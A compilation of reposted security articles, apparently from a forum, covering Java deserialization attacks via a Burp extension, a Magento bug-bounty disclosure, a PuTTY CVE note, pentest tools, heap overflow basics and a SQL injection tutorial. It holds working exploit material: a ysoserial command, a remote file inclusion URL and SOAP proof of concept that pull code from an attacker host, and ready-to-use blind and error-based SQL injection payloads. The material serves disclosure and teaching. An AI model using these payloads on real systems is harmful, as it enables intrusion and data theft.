[Evolution Security GmbH]™ -- VULNERABILITY LABORATORY - RESEARCH TEAM SERVICE: www.vulnerability-lab.com CONTACT: research () vulnerability-lab com Sursa: http://seclists.org/fulldisclosure/2016/Mar/15

Java Deserialization Attacks with Burp Eric Gruber | March 2, 2016 Introduction This blog is about Java deserialization and the Java Serial Killer Burp extension. If you want to download the extension and skip past all of this, head to the Github page here. The recent Java deserialization attack that was discovered has provided a large window of opportunity for penetration testers to gain access to the underlying systems that Java applications communicate with. For the majority of the applications we see, we can simply proxy the connection between the application and the server to view the serialized body of the HTTP request and HTTP response, assuming that HTTP is the protocol that is being used for communication. For this blog, HTTP is going to be assumed and to perform any type of proxying for HTTP, we will use Burp. Burp Proxy Here’s a simple example what a Burp proxied HTTP request with a serialized Java object in its body looks like: In this example we have a serialized object called State that is comprised of two Strings, capitol (spelled wrong in the example) and nicknames. From here, we can manipulate the request by sending it to the Repeater tab. Generating Serialized Exploits There are a few tools out there that will generate serialized Java objects that are able to exploit vulnerable software. I’m a big fan of Chris Frohoff’s ysoserial (https://github.com/frohoff/ysoserial.git). He has payload generators for nine exploitable software stacks at the time of me writing this. Simply running the jar file with the payload type and command to execute will generate the serialized object for you. Just make sure you output it to a file: java -jar ./ysoserial-0.0.4-all.jar CommonsCollections1 'ping netspi.com' > payload We can then copy the serialized output into Burp using the paste from file context menu item: Which will result in the following: Generating Serialized Exploits in Burp Ysoserial works well enough, but I like to optimize my exploitation steps whenever possible. This includes removing the need to go back and forth between the command line and Burp. So I created the Burp extension Java Serial Killer to perform the serialization for me. It essentially is a modified Repeater tab that uses the payload generation from ysoserial. To use Java Serial Killer, right click on a POST request with a serialized Java object in the body and select theSend to Java Serial Killer item. A new tab will appear in Burp with the request copied over into a new message editor window. In the Java Serial Killer tab there are buttons for sending requests, serializing the body, selecting a payload type, and setting the command to run. For an example, say we want to ping netspi.com using the CommonsCollections1 payload type, because we know it is running Commons-Collections 3.1. We just set the payload in the drop down menu and then type the command we want and press the serialize button. Pressing the little question mark button will also display the payload types and the software versions they are targeting if you need more information. We now have our command in a serialized object in the request. Pressing the Go button will send the request off and show the response on the right hand side. If you prefer to use Repeater, you can send it to that too. If you want to try another payload, simply select the new payload and hit serialize again. As Chris Frohoff adds more payloads, I plan to update Java Serial Killer accordingly. Conclusion I submitted the plugin to the Burp app store and I don't expect it to take too long to get approved, but if you want to try it out now, you can get it from our Github page (https://github.com/NetSPI/Burp-Extensions/releases). You will need to be running Java 8 for it to work. Sursa: https://blog.netspi.com/java-deserialization-attacks-burp/

Heartbleed e singurul atact si simplu si "reliable" si util. Ceva detalii aici despre DROWN: http://blog.cryptographyengineering.com/2016/03/attack-of-week-drown.html

AuthMatrix for Burp Suite – Web Authorisation Testing Tool AuthMatrix a web authorisation testing tool built as an extension to Burp Suite that provides a simple way to test authorisation in web applications and web services. With AuthMatrix, testers focus on thoroughly defining tables of users, roles, and requests for their specific target application upfront. These tables are displayed through the UI in a similar format to that of an access control matrix commonly built in various threat modelling methodologies. Once the tables have been assembled, testers can use the simple click-to-run interface to efficiently run all combinations of roles and requests. Testers can then confirm their results with an easy to read, color-coded interface indicating any authorisation vulnerabilities detected in the system. Additionally, the extension provides the ability to save and load target configurations for simple regression testing. Usage Create users that fit these various roles and check all roles that the user belongs to. If a user is part of multiple roles, check each role individually. From another area of Burp Suite (i.e. Target tab, Repeater Tab, etc) right click a request and select “Send to AuthMatrix.” This will create a new item in the second table of the interface. Multiple requests can be added all at once by selecting several requests from within the Target tab. In the second table of AuthMatrix, check all roles that are authorised to make each request. Create a regex based on the expected response behavior of the request to determine if the action has succeeded. Common regexes include HTTP Response headers, success messages within the body, or other variations within the body of the page. Generate session tokens for each user via a web browser or the repeater tab and enter them into the correct field within the first table. Click Run to run all requests or right click several messages and select run. Observe that the adjacent table will show color-coded results, red indicating the request did not return expected results and may indicate a vulnerability. You can download AuthMatrix here: AuhtMatrix.py Or read more here. Sursa: http://www.darknet.org.uk/2016/03/authmatrix-for-burp-suite-web-authorisation-testing-tool/

Attacking The XNU Kernel In El Capitain

Hacking Magento eCommerce For Fun And 17.000 USD Magento, which was acquired by Ebay Inc back in 2011, is one of the most popular e-commerce platforms written in PHP. There is an interesting bug bounty program in place that offers bounties of up to 10,000$ for Information Disclosure and Remote Code Execution vulnerabilities. In November 2014, I decided to give it a try, so I started looking for security bugs in Magento CE, and almost immediately I discovered a PHP Object Injection vulnerability which (un)fortunately requires administrator privileges in order to be exploited. I thought this reason was good enough to choose not to report my finding under their bug bounty program, since Magento administrators should already be able to upload and execute arbitrary code through the administration panel. However, after a couple of weeks a friend of mine encouraged me to submit the finding, because you never know. So I did it, and when I finished writing my report including a PoC, and I was about to send it, I noticed that the bug had already been (silently!) patched only a few days earlier! The researcher who reported the vulnerability has been awarded with 2,500$ for the very same finding… A couple of months later, in February 2015, there was a lot of rumors about what I consider a very nice piece of research which chains several vulnerabilities in Magento that ultimately allow an unauthenticated attacker to execute arbitrary PHP code on the web server. Getting inspired by these vulnerabilities, I decided to come back to Magento source code looking for new security bugs, and I discovered and reported two vulnerabilities which made me win two bounties I’d never thought I’d receive: 8,000$ and9,000$. Both of the vulnerabilities were discovered in February 2015, however I decided to report only a “potential Remote Code Execution” at a first stage, because I thought the other one – a trivial information leakage bug – had a security impact too low in order to be eligible for the bug bounty program, in other words I thought it wasn’t a “real” security issue. I was wrong (again!)… • Autoloaded File Inclusion in SOAP API (CVE-2015-6497) There is a class of vulnerabilities that might affect certain PHP applications which uses an “exploitable” autoloading mechanism. The “Autoloading Classes” feature has been introduced in PHP 5.0 with the magic function __autoload() which is automatically called when your code references a class or interface that hasn’t been loaded yet. So, instead of including every needed class by hand, it is possible to register a function that gets called as soon as the code tries to instantiate an unknown class. This function gets passed the unknown class name and is responsible for including the right file that contains the class definition. While this feature is extremely useful and powerful, it might introduce potential Local/Remote File Inclusion vulnerabilities when user-controlled input is used as a class name. Indeed, if an attacker can control the class name variable passed to an autoloading function, she could try to play around with it in order to include an arbitrary file and execute PHP code remotely. There are multiple ways to trigger the autoloader, the most obvious is class instantiation using the new operator. In addition to that, there are some PHP functions which can be considered a sensitive sink for this class of vulnerabilities. Here is an incomplete list: class_exists() interface_exists() method_exists() property_exists() is_subclass_of() … So, when user-controlled input (tainted data) enters one of these sensitive sinks there’s a chance for the application to be vulnerable to an “Autoloaded File Inclusion” attack. Let’s see a simple example of vulnerable code: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 /* Some code... */ function __autoload($class_name) { include $class_name . '.php'; } if(isset($_GET['class']) && class_exists($_GET['class'])) { $myObject = new $_GET['class']; } else { die('No class found'); } /* Some code... */ In this example an attacker controls a class name via the GET parameter “class”, which is first used with the class_exists()function (triggering the autoloader in case it is an unknown class) and then to instantiate a new object. This means that the attacker can control the $class_name variable passed to the autoloader, therefore it could be possible to include arbitrary files from both local or remote resources by invoking URLs like these: http://example.com/vuln.php?class=http://attacker.com/shell http://example.com/vuln.php?class=../../../tmp/cache/attacker_controlled/file In the first case the autoloader will try to include and execute the PHP code located at http://attacker.com/shell.php, resulting in a Remote File Inclusion (RFI); while in the second case the autoloader will try to include and execute the PHP code located into the file /tmp/cache/attacker_controlled/file.php, resulting in a Local File Inclusion (LFI). Furthermore, in cases like this where the attacker controls the classname’s prefix, in addition to http:// other PHP wrappers might be abused in order to execute arbitrary PHP code. According to the official PHP documentation “a valid class name starts with a letter or underscore, followed by any number of letters, numbers, or underscores”. That means an attacker cannot include arbitrary files via class names because it should not be possible to e.g. use path traversal sequences (../../) through them. But here comes the problem: there was a bug in the PHP core which allowed to invoke class autoloaders with invalid class names. This bug was solved in January 2014 with the release of PHP versions 5.4.24 and 5.5.8, and that’s probably one of the reasons why Magento’s security engineers have undervalued this issue. Magento Vulnerability The vulnerability in Magento is caused by the code that handles the “catalogProductCreate” SOAP API call. The vulnerable code is located into the /app/code/core/Mage/Catalog/Model/Product/Api/V2.php script: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 public function create($type, $set, $sku, $productData, $store = null) { if (!$type || !$set || !$sku) { $this->_fault('data_invalid'); } $this->_checkProductTypeExists($type); $this->_checkProductAttributeSet($set); /** @var $product Mage_Catalog_Model_Product */ $product = Mage::getModel('catalog/product'); $product->setStoreId($this->_getStoreId($store)) ->setAttributeSetId($set) ->setTypeId($type) ->setSku($sku); if (!property_exists($productData, 'stock_data')) { //Set default stock_data if not exist in product data $_stockData = array('use_config_manage_stock' => 0); $product->setStockData($_stockData); } This method expects the $productData parameter to be an array (in form of a stdClass object) and uses the property_exists()function with it. However, an attacker can manipulate a SOAP request arbitrarily and send the $productData parameter in form of a string. In this case, if the string passed to the property_exists() function is an unknown class, any registered autoloader function will be triggered. When the property_exists() function is called there’s only one autoloader function registered, that is theVarien_Autoload::autoload() method: 1 2 3 4 5 6 7 8 9 10 11 12 13 14 public function autoload($class) { if ($this->_collectClasses) { $this->_arrLoadedClasses[self::$_scope][] = $class; } if ($this->_isIncludePathDefined) { $classFile = COMPILER_INCLUDE_PATH . DIRECTORY_SEPARATOR . $class; } else { $classFile = str_replace(' ', DIRECTORY_SEPARATOR, ucwords(str_replace('_', ' ', $class))); } $classFile.= '.php'; //echo $classFile;die(); return include $classFile; } In such a scenario, the $class parameter automatically passed to this method is exactly the same string value sent through the$productData parameter from the SOAP request, which after some replacementes and a “.php” string appended to it, is being used in a call to the include() function. This may result in an arbitrary file inclusion (both from local or remote resources) and could be exploited to include and execute arbitrary PHP code. There are some conditions which should be met to exploit this vulnerability: an API user account with privileges to create a catalog product is required; in order to include arbitrary files from remote locations, Magento should run on PHP before 5.4.24 or 5.5.8, because such versions have fixed the issue related to invalid class names in the autoloading process; in order to include arbitrary files from remote locations the “allow_url_include” directive must be set to On; in case the “allow_url_include” directive is set to Off it might still be possible to include files from remote locations using thessh2.sftp:// wrapper (which requires the SSH2 extension to be installed) or execute arbitrary OS commands leveraging theexpect:// wrapper (which requires the Expect extension to be installed). NOTE: if Magento is running on PHP version after 5.4.23 or 5.5.7 the vulnerability could still be exploited by including a local file with a .php extension (something like /tmp/test.php). If Magento is running on PHP before 5.3.4 the vulnerability could be exploited to include arbitrary local files with any extension (e.g. a session file containing malicious PHP code injected by the attacker) because NULL bytes are allowed within the path (see CVE-2006-7243). Proof of Concept A remote attacker with valid API credentials could send a SOAP request like the following in order to exploit the vulnerability: POST /magento/index.php/api/v2_soap HTTP/1.0 Host: localhost Content-Length: 804 Connection: close <?xml version=”1.0″ encoding=”UTF-8″?> <SOAP-ENV:Envelope xmlns:SOAP-ENV=”http://schemas.xmlsoap.org/soap/envelope/” xmlns:ns1=”urn:Magento” xmlns:xsd=”http://www.w3.org/2001/XMLSchema” xmlns:xsi=”http://www.w3.org/2001/XMLSchema-instance” xmlns:SOAP-ENC=”http://schemas.xmlsoap.org/soap/encoding/” SOAP-ENV:encodingStyle=”http://schemas.xmlsoap.org/soap/encoding/”> <SOAP-ENV:Body> <ns1:catalogProductCreate> <sessionId xsi:type=”xsd:string”>VALID_SESSION</sessionId> <type xsi:type=”xsd:string”>simple</type> <set xsi:type=”xsd:string”>4</set> <sku xsi:type=”xsd:string”>test</sku> <productData xsi:type=”xsd:base64Binary”>ZnRwOi8vYXR0YWNrZXI6cGFzc3dvcmRAYXR0YWNrZXJfc2VydmVyLmNvbS9ob21lL2F0dGFja2VyL2V2aWw=</productData> <storeView xsi:nil=”true”/> </ns1:catalogProductCreate> </SOAP-ENV:Body> </SOAP-ENV:Envelope> The “productData” parameter has been encoded in base64 within the SOAP request, and the decoded string is the following: ftp://attacker:password@attacker_server.com/home/attacker/evil This means that leveraging the ftp:// wrapper, an attacker might be able to force Magento to load and execute malicious code from a FTP server under its control. In this example, the attacker only has to put the malicious code under /home/attacker/evil.php. However, as we said before, other PHP wrappers might be abused, potentially leading to direct arbitrary PHP code execution. Responsible Disclosure Timeline As I was saying, I reported this vulnerability in late February 2015, and I received the first reply from the Magento Security Team on June 22, 2015, stating that my submission was not eligible for the bug bounty program, because it was found to be invalid and not actionable. The reason for the rejection was that there are too many requirements to exploit the vulnerability. First of all, it requires Magento to be running on outdated PHP versions, because this kind of vulnerability has been fixed in the PHP core engine at the beginning of 2014. However, until today there are still many websites out there using such outdated PHP versions. That should be one of the reasons why the Magento Security Team replied on June 24, stating the following: We were able to confirm your issue. Even though it requires knowing API credentials, it should not be possible to execute such actions. The PHP versions that are additionally vulnerable, while old are still used in popular distributions like RHEL 7.1. We will schedule fixing this issue for our next product release given lower priority. We will inform you regarding possible awards associated with this report. On August 4, 2015, a bundle of patches (SUPEE-6482), which resolved several security-related issues, including the one I reported in February, was released by the Magento team. On the same day Magento released new versions (Community Edition 1.9.2.1 and Enterprise Edition 1.14.2.1) that include SUPEE-6482 along with other security patches. On August 13 I sent them an email asking whether there was any chance to get a bounty for reporting such a vulnerability. I had to ping them twice more, before getting their reply on August 25: Hello Egidio, Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $8,000. I published KIS-2015-04 on September 11, 2015 and I received my bug bounty on September 21, 2015. • Information Disclosure in RSS Feed (CVE-2016-2212) After a while, in late October 2015, I remembered about that information leakage bug I discovered back in February, and I wondered “Why don’t try to report this as well? Maybe I’m missing something out and I wrongly believe this isn’t a real security issue”. Actually I was missing something crucial, the fact that leveraging this vulnerability a remote unauthenticated attacker might be able to download order comments and other order-related information, potentially including Personally Identifiable Information or credit card data… What a bad “AppSec Guy” I am!! I reported this vulnerability on October 29, 2015, including a Proof of Concept code, and a proposed patch for the vulnerability, which is exactly the same they used to fix the issue. I received a reply from the Magento Security Team on the very same day: Hello Egidio, Thank you for your submission. We have logged ticket APPSEC-1171 to track this issue. We will reach out to you once our security engineers have validated this issue. Per the Magento Responsible Disclosure Guidelines, we ask that you do not disclose your finding to the public or to the media while we validate your submission with our security engineers. After some months of silence, it was a wonderful Sunday afternoon when I noticed that some days earlier, specifically on January 20, 2016, the Magento team released SUPEE-7405 and new Magento versions which include fixes for several security-related issues, including “Information Disclosure in RSS feed – APPSEC-1171″. Consequently, I sent them another email asking whether there was any chance to get a bounty for reporting such a vulnerability (again!). I got their reply on February 1, 2016: Hello Egidio, Congratulations! Your vulnerability report and proof of concept have been accepted and you will be receiving a bounty of USD $9,000. I received my bug bounty on February 12, 2016 and I published KIS-2016-02 on February 23, 2016. Actually there is a weird coincidence, because that very same day, only a few hours before publishing the advisory on my website, they pushed an update:SUPEE-7405 v1.1 patch bundle. It could be just a coincidence, however I found this very curious… don’t you? Conclusion Seeing my personal experience with the Magento bug bounty program (and even experiences from other security researchers), it looks like they truly believe in a “security through obscurity” methodology. I’m quite disappointed by the fact they tried to downplay the severity of my vulnerabilities, silently patching them after several months, without letting me know their progresses. However, what really disappoints me is that my vulnerabilities seem to be quite critical, specially considering they’re the only two classes of security bugs they’re willing to pay up to 10,000$ under their bug bounty program. I had to ping them several times in order to get my bounties, so I believe they tried to “obscure” and underevaluate my findings not only because of their “security through obscurity” methodology, but probably because they were also hoping I’d never noticed their advisories with my name and the vulnerabilities I reported, and never claimed my bounties for such findings? This entry was posted on March 3, 2016 Sursa: http://karmainsecurity.com/hacking-magento-ecommerce-for-fun-and-17000-usd

VuNote Author: tintinweb@oststrom.com <github.com/tintinweb> Ref: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563 Version: 0.1 Date: Feb 20th, 2016 Tag: putty pscp client-side post-auth stack buffer overwrite when processing remote file size Overview Name: putty Vendor: sgtatham References: * http://www.chiark.greenend.org.uk/~sgtatham/putty/ [1] Version: 0.66 [2] Latest Version: 0.66 Other Versions: 0.59 [3] (~9 years ago) <= affected <= 0.66 Platform(s): win/nix Technology: c Vuln Classes: stack buffer overwrite (CWE-121) Origin: remote Min. Privs.: post auth CVE: CVE-2016-2563 Description quote website [1] PuTTY is a free implementation of SSH and Telnet for Windows and Unix platforms, along with an xterm terminal emulator. It is written and maintained primarily by Simon Tatham. Summary The putty SCP command-line utility (pscp) is missing a bounds-check for a stack buffer when processing the SCP-SINK file-size response to a SCP download request. This may allow a malicious server to overwrite the stack buffer within the client- application potentially leading to remote code execution. PoC attached. patch attached. Besides that, two minor issues have been reported in putty packet handling: DoS condition in the parsing of SSH-Strings that lead to a nullptr read. (connect putty to poc and type 'x11exploit' to trigger one occurrence of a crash) DoS condition in the handling of unrequested forwarded-tcpip channels open requests that lead to a nullptr read. (connect putty to poc and type 'forwardedtcpipcrash' to trigger crash) Link: https://github.com/tintinweb/pub/tree/master/pocs/cve-2016-2563

Ransomware Tracker https://ransomwaretracker.abuse.ch/

ODAT ODAT (Oracle Database Attacking Tool) is an open source penetration testing tool that tests the security of Oracle Databases remotely. Usage examples of ODAT: You have an Oracle database listening remotely and want to find valid SIDs and credentials in order to connect to the database You have a valid Oracle account on a database and want to escalate your privileges to become DBA or SYSDBA You have a Oracle account and you want to execute system commands (e.g. reverse shell) in order to move forward on the operating system hosting the database Tested on Oracle Database 10g, 11g and 12c(12.1.0.2.0). Link: https://github.com/quentinhardy/odat

Understanding the Heap & Exploiting Heap Overflows This post will begin with a high level description of the heap and slowly builds up untill you able to write your own heap-based exploits. We assume we have non-root access to a computer but are able to run the following program as root (meaning it's a suid binary): #include <string.h> #include <stdlib.h> #include <stdio.h> int main(int argc, char *argv[]) { char *buf1 = malloc(128); char *buf2 = malloc(256); read(fileno(stdin), buf1, 200); free(buf2); free(buf1); } view rawheapsploit1.c hosted with ❤ by GitHub There's a blatant buffer overflow in line 10 which we will be exploiting. First we need to know how the heap is managed (we focus on Linux). Basic Heap and Chunk Layout Every memory allocation a program makes (say by calling malloc) is internally represented by a so called "chunk". A chunk consists of metadata and the memory returned to the program (i.e., the memory actually returned by malloc). All these chunks are saved on the heap, which is a memory region capable of expanding when new memory is requested. Similarly, the heap can shrink once a certain amount of memory has been freed. A chunk is defined in the glibc source as follows: struct malloc_chunk { INTERNAL_SIZE_T prev_size; /* Size of previous chunk (if free). */ INTERNAL_SIZE_T size; /* Size in bytes, including overhead. */ struct malloc_chunk* fd; /* double links -- used only if free. */ struct malloc_chunk* bk; /* Only used for large blocks: pointer to next larger size. */ struct malloc_chunk* fd_nextsize; /* double links -- used only if free. */ struct malloc_chunk* bk_nextsize; }; view rawmalloc\malloc.c hosted with ❤ by GitHub Assuming no memory chunks have been freed yet, new memory allocations are always stored right after the last allocated chunk. So if a program were to call malloc(256), malloc(512), and finally malloc(1024), the memory layout of the heap is as follows: Meta-data of chunk created by malloc(256) The 256 bytes of memory return by malloc ----------------------------------------- Meta-data of chunk created by malloc(512) The 512 bytes of memory return by malloc ----------------------------------------- Meta-data of chunk created by malloc(1024) The 1024 bytes of memory return by malloc ----------------------------------------- Meta-data of the top chunk The dash line "---" is an imaginary boundary between the chunks, in reality they are placed right next to each other (example program illustrating the layout). Anyway, you're probably wondering why I included the meta data of the "top chunk" in the layout. Well, the top chunk represents the remaining available memory on the heap, and it is the only chunk that can grow in size. When a new memory request is made, the top chunk is split into two: the first part becomes the requested chunk, and the second part is the new the top chunk (so the "top chunk" shrunk in size). If the top chunk is not large enough to fulfill the memory allocation, the program asks the operating system to expand the top chunk (making the heap grow in size). Articol complet: http://www.mathyvanhoef.com/2013/02/understanding-heap-exploiting-heap.html

Windows Filtering Platform: Persistent state under the hood ri 04 March 2016 By Damien Aumaitre Alexandre Gazet Since Windows XP SP2, the Windows firewall is deployed and enabled by default in every Microsoft Windows operating system. The firewall relies on a set of API and services called the Windows Filtering Platform (WFP). Although used by almost every Windows OS, WFP is still one of the relatively unknown beast that lies in the kernel. In this post we will see how the firewall manages its persistent state. Disclaimer: this post was written a year ago with Alexandre Gazet, a former colleague. After gathering dust for too long we decided to publish it anyway. All experiments were conducted on a Microsoft Windows 8.1 operating system. Introduction The registry is full of unknown binary blobs. Not so long ago, we stumbled upon the registry sub-key of the BFE service. On this picture we see a bunch of entries with a name that looks like a GUID and some binary data. So what is this BFE thingy? A quick search on Google points us on the right direction: BFE stands for Base Filtering Engine which is a core part of the Windows Filtering Platform (WFP). Since Windows XP SP2, the Windows firewall is deployed and enabled by default in every Microsoft Windows operating system. The firewall relies on a set of API and services called the Windows Filtering Platform (WFP). Although used by almost every Windows OS, WFP is still one of the relatively unknown beast that lies in the kernel. The WFP architecture is well explained on the MSDN (http://msdn.microsoft.com/en-us/library/windows/desktop/aa366509(v=vs.85).aspx) Amongst the points of high interest we can mention two components: the user-mode Base Filtering Engine (BFE locating in bfe.dll) and its kernel-mode counterpart KM Filter Engine (KMFE located in netio.sys). WFP can be used by third parties to develop advanced filtering or routing solution (implementing a VPN solution comes to mind). However, this is also the core of the well known Windows firewall which comes by default with a set of pre-configured rules: For now let's just say that a filter is a rule that governs classification. It defines a set of conditions, when met, triggers an action (ie: a callout). A filter operates at a certain level: e.g.: FWPM_LAYER_OUTBOUND_TRANSPORT_V4_DISCARD. Rules are grouped into providers that define "logical features" (for example: Microsoft Windows WFP Built-in TCP Templates provider or Windows Firewall IPsec Provider). Our objective is to discover how the OS interacts with the WFP and how the configuration is persistently stored in the binary format. With this premise in mind, we'll start to examine the WFP objects' lifetime. A quick look on the documentation tells us that WFP objects can have one of four possible lifetimes: Dynamic: An object is dynamic only if it is added using a dynamic session handle. Dynamic objects live until they are deleted or the owning session terminates. Static: Objects are static by default. Static objects live until they are deleted, BFE stops, or the system is shutdown. Persistent: Persistent objects are created by passing the appropriate FWPM_*_FLAG_PERSISTENT flag to an Fwpm*Add0 function. Persistent objects live until they are deleted. Built-in: Built-in objects are predefined by BFE and cannot be added or deleted. They live forever. Kernel-mode Filters can be marked as boot-time filters by passing the appropriate flag to FwpmFilterAdd0 function. Boot-time filters are added to the system when the TCP/IP driver starts, and removed when BFE finishes initialization. So how are these persistent objects managed? It's time to do a bit of reversing. Articol complet: http://blog.quarkslab.com/windows-filtering-platform-persistent-state-under-the-hood.html

Exploiting 'INSERT INTO' SQL Injections Ninja Style In the deep hours of the night you stumble upon a form where you are asked for, among other things, your nickname. You enter a single quote ' as your name and you get an error message saying: "You have an error in your SQL syntax". With high probability the SQL injection is taking place in an INSERT statement. Now, you could simply start sqlmap and let it try to do the dirty work. But there's a disadvantage: An automated tool will probably send some request where the INSERT statement succeeds. This will create strange entries in the database. We must avoid this to remain stealthy. Let's create a similar situation locally and demonstrate this. Our test code is: <?php $con = mysql_connect("localhost", "root", "toor") or die(mysql_error($con)); mysql_select_db("testdb", $con) or die(mysql_error($con)); $var = $_POST['post']; mysql_query("INSERT INTO data VALUES ('one', '$var')") or die(mysql_error($con)); mysql_close($con) or die(mysql_error($con)); echo "The values have been added!\n"; ?> Normally a good programmer will write better code than that, but it's just an example and will suffice to demonstrate the exploit. We run sqlmap against this using the command ./sqlmap.py -u "http://localhost/test.php" --data "post=ValidValue" -v 3 The (partly redacted) output of the command can be seen on pastebin. It found an error-based SQL injection. We will return to this result at the end of the post. For now we will ignore the error-based SQL injection and only notice that unwanted new database entries have been added by using sqlmap: Avoiding unwanted inserts We must find a query that is syntactically correct yet contains a semantic error. Moreover the semantic error should only be detectable by executing the query. I immediately thought of scalar subqueries. These are subqueries that must return only a single row, otherwise an error is thrown. As quoted from the MySQL manual: In its simplest form, a scalar subquery is a subquery that returns a single value. A scalar subquery is a simple operand, and you can use it almost anywhere a single column value or literal is legal, and you can expect it to have those characteristics that all operands have: a data type, a length, an indication that it can be NULL, and so on. An artificial example is: SELECT (SELECT name FROM users WHERE email = 'bobby@tables.com') If the subquery is empty it's converted to the value NULL. Now, if email is a primary key then at most one name will be returned. If email isn't a primary key it depends on the contents of the database. This proves that we must first execute the subquery and only then will we know if it's really a scalar subquery or not! Another variation where the subquery must be scalar is: SELECT 'Your name is: ' || (SELECT name FROM users WHERE email = 'bobby@tables.com') Here || stands for the string concatenation. The following query will always return the error "#1242 - Subquery returns more than 1 row" (tested with MySql). SELECT (SELECT nameIt FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) Alright so we have a query that is executed yet returns an error. This prevents the original INSERT INTO command from being executed, yet our own SQL code will be executed. I will now show how to turn this into a usable blind SQL injection. We will create different behavior/results based on a boolean condition. We can follow two strategies to achieve this. The first is to find another semantic error and output a different error based on the boolean condition. The second strategy is to use a timing attack: If the condition is true the query will complete instantly, otherwise it takes a longer time. The timing attack is the easier one to create. Consider the following SQL statement, where we replaced the nameIt column of the previous SQL statement with a more advanced expression: SELECT (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) If <condition> is true the server will sleep for 3 seconds and then throw an error that the subquery returned more than one result. Otherwise, if <condition> is false, it will instantly throw the error. All that is left to do is to measure the time it takes for the server to answer the query so we know whether the condition was true or not. We can use automated tools that perform the timing attack based on this foundation. Let's return to our example php code. What do we need to set our argument called post to in order to launch the attack? Try figuring it out yourself first. This is something you must learn to do on your own, especially since you are given the source code. Sending the following will do the trick: ' || (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || ' This will expand to: INSERT INTO data VALUES ('one', '' || (SELECT CASE WHEN <condition> THEN SLEEP(3) ELSE 'anyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || '') Which is valid SQL syntax! Speeding up the attack This is all good and well, but because it's a time based attack it can take an extremely long time to execute. We focus on the other strategy where we trigger different errors based on the boolean condition. First we need to find another error that we can trigger based on a boolean condition. Sound fairly straightforward, but it turns out generating an error is easy, yet finding errors that are generated whilst executing the query and controllable by a boolean condition can be quite hard. After more than an hour of messing around with some SQL statements and reading the MySQL documentation I finally found something usable! I got the following SQL statement: SELECT 'canBeAnyValue' REGEXP (SELECT CASE WHEN <condition> THEN '.*' ELSE '*' END) Here the construct 'value' REGEXP 'regexp' is a boolean condition that is true when value matches the regular expression regexp and is false otherwise. Note that '.*' is a valid regular expression and '*' is not. So when <condition> is true the regular expression will simply be evaluated. When it's false an invalid regular expression is detected and MySql will return the error "#1139 - Got error 'repetition-operator operand invalid' from regexp". Excellent! We can now create a boolean based blind SQL injection where the subquery error is returned if the condition is true, and the regular expression error is returned when the condition is false. But there's a snag: One must be careful with the REGEXP error. Say you modify the time based SQL attack statement to the following: SELECT (SELECT CASE WHEN <condition> THEN 'anyValue' REGEXP '*' ELSE 'AnyValue' END FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) You reason as follows: If <condition> is false it will return 'thisCanBeAnyValue' twice and then throw an error that the subquery returned more than one result. If <condition> is true it tries to evaluate 'anyValue' REGEXP '*' and throw the regular expression error. But this is not what will happen! With this line you will always end up with the regular expression error. Why? Because MySql knows that 'anyValue' REGEXP '*' is a constant expression and doesn't depend on anything. Therefore it will optimize the query and calculate this value in advance. So even though <condition> is false it still attempts to evaluate the regular expression during the optimization step. This always fails, and hence the regular expression error is always returned. The trick is to put the '*' and '.*' in a separate SELECT CASE WHEN .. END control flow so it won't be optimized. We conclude our story with the following SQL statement against our example code: ' || (SELECT 'thisCanBeAnyValue' REGEXP (SELECT CASE WHEN <condition> THEN '.*' ELSE '*' END) FROM ((SELECT 'value1' AS nameIt) UNION (SELECT 'value2' AS nameIt)) TEST) || ' When the condition is false the regular expression error will be returned, and when the condition is true the subquery error will be returned. All this happens without the actual INSERT statement being successfully executed even once. Hence the website administrator will notice no weird entries in his database. And last but not least, this attack is faster compared to the earlier time based attack. Beautiful! Even better: Error-based SQL injection The previous methods were ideas I found myself. However the website is returning an error message, and there is a known error-based SQL injection technique that can return database entries in the error message. This is the type of attack that sqlmap also returned. With an error-based SQL injection we can greatly speed up the attack. The technique is based on the follow query: SELECT COUNT(*), CONCAT(' We can put any scalar subquery here ', FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x When we execute this command I get the message "ERROR 1062 (23000): Duplicate entry 'We can put any scalar subquery here' for key 'group_key'". As you can see the original input string is returned in the error message! In fact we can put any value we want there, including scalar subsqueries. Let's first investigate why this error is returned. In the MySql documentation we first notice: "You cannot use a column with RAND() values in an ORDER BY clause, because ORDER BY would evaluate the column multiple times". RAND() will also be evaluated multiple times in a GROUP BY clause. Each time RAND() is evaluated it will return a new result. Okay, so according to the documentation we're actually not allowed to use the function RAND() like this. Why? Because the function returns a new value each time it's evaluated yet MySql expects a function to always return this same value. This can cause strange error messages like the one we just got. One possible description of an Advanced Persistant Threat. ... people smarter than me found the "non-blind" error-based attack ... Nevertheless the error message contains a user controllable string! Meaning we can let it return any database entry we want, which greatly speeds up the attack. But perhaps you're still wondering why this particular query fails. Well, answering that question means knowing exactly how the DBMS executes the query. Investigating this is way out of scope for this post. Just remember that in our query the problem is caused because the RAND() function is internally reevaluated and will return a different value, which is something the DBMS is not expecting. Let's put this in our example code again. Something like the following will suffice: ' || (SELECT 'temp' FROM (SELECT COUNT(*), CONCAT(( subquery returning the value we want to retrieve ), FLOOR(RAND(0)*2)) x FROM information_schema.tables GROUP BY x) FromTable) || ' Et voila, we have a very fast SQL injection. Depending on the tables we can access, this example might need to be modified in order to work properly. In particular we can also include one of the previous SQL injections that always generate an error. This way we will be sure data is never inserted. After all, we are relying on undefined behavior which causes the error to show up. Who knows if there exists another DBMS that handles these queries with RAND() in them differently and they don't produce an error. As a last note, being stealthy is always a relative notion. In some cases SQL errors could be logged and an administrator could be notified when they happen. In such a situation this attack wouldn't be stealthy at all! Follow me on twitter @vanhoefm Addendum: For Oracle 8, 9 and 10g databases the function utl_inaddr.get_host_name can be used to launch an error-based SQL injection. For Oracle 11g ctxsys.drithsx.sn and other functions can be used. 